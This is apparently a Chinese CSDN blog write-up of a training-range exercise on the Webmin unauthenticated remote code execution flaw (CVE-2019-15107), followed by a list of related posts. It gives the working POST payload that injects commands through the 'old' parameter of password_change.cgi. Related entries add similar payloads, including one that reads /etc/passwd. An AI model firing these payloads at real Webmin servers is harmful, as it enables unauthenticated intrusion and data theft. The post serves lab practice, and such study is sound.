Webmin未经身份验证的远程代码执行-墨者学院

最新推荐文章于 2023-12-13 17:20:03 发布
最新推荐文章于 2023-12-13 17:20:03 发布
阅读量517 收藏
点赞数
分类专栏: 墨者学院 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45158261/article/details/107665625
版权

01 背景介绍

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码

02 影响版本:

Webmin<=1.920

03 利用方式

1.修改路径 session_ login.cgi 为 password_change.cgi
2.修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

04 漏洞靶场

在这里插入图片描述1.使用burp抓包,修改下面的数据包
在这里插入图片描述 ## poc:
1.修改路径 session_ login.cgi 为 password_change.cgi
2.修改参数 user=jammny&pam=&expired=2&old=test1|ls /&new1=test2&new2=test2

修改后的数据包如下

在这里插入图片描述查看key.txt :
user=jammny&pam=&expired=2&old=test1|cat /key.txt&new1=test2&new2=test2
在这里插入图片描述

白鸽i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院Webmin未经身份验证远程代码执行(简单复习)
LRedAnt的博客
12-25 1454
墨者学院Webmin未经身份验证远程代码执行(简单复习) 背景描述: Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞介绍(cve-2019-1...
墨者学院-Webmin未经身份验证远程代码执行
qq_47094508的博客
07-01 610
首先拿到靶场后进行访问,访问后来到一个登陆页面根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行 直接查询根下的key.txt即可......
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
墨者Webmin未经身份验证远程代码执行题解
zr1213159840的博客
01-11 430
先随便输入账号密码,然后抓包 将上图的post部分修改为 password_change.cgi 将提交的数据部分修改为 user=hhhh&pam=1&expired=2&old=cat /key.txt&new1=1111&new2=1111 一直forward拿到key
墨者学院Webmin未经身份验证远程代码执行
yoyoko_chan的博客
07-29 500
0x00 0x01  进入靶场,发现是个登录界面  搜索查找了这个漏洞的详情后,知道了该漏洞编号为CVE-2019-15107,根据漏洞介绍,知道了该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。  所以将其用BurpSuite抓包到重放模块。修改访问地址、Referer以及POST内容  查看可知根目录下存在key.txt,修改poc读出key即可 0x03  学到了新的cve,了解了一个新的poc。 ...
墨者Webmin未经身份验证远程代码执行(CVE-2019-15107)wp
m0_58543272的博客
08-10 564
墨者Webmin未经身份验证远程代码执行wp
Webmin未经身份验证远程代码执行
weixin_47493074的博客
09-21 214
Webmin漏洞
Webmin未经身份验证远程代码执行(CVE-2019-15107)
m0_58606546的博客
01-11 3120
0x01 漏洞详情 Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下执行恶意代码,后经知道创宇404实验室发现,该漏洞的存在实则是sourceforge上某些版本的安装包和源码被植入了后门导致的。 0x02 影响版本 webmin<=1.920 0x03 漏
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2037
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
墨者靶场(初级) Webmin未经身份验证远程代码执行
曹振国的博客
06-24 333
命令执行的漏洞在old参数后 1. 漏洞原理 https://www.anquanke.com/post/id/184668 2. 漏洞复现 https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md 3. 漏洞利用 (1)修改提交地址 POST /session_login.cgi HTTP/1.1 ===> POST /password_change.cgi HTTP/1.
Webmin未经身份验证远程代码执行 CVE-2019-15107 漏洞复现
ADummy的博客
03-02 284
Webmin未经身份验证远程代码执行(CVE-2019-15107) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能
CVE-2022-0824 Webmin 远程代码执行
weixin_45501486的博客
03-22 192
0x00 简介Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地集合对象一样轻松地操作分布式数据集。spark除了能够提供交互式查询外,它还可以优化迭代工作负载。0x01 漏洞概述该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable...
Vulfocus练习之Webmin远程代码执行(CVE-2022-0824)
最新发布
weixin_45701865的博客
12-13 898
Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的 GitHub 存储库 webmin/webmin 中对远程代码执行的访问控制不当。
Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824
08-31 2054
WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。......
Webmin 远程代码执行 (CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3304
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值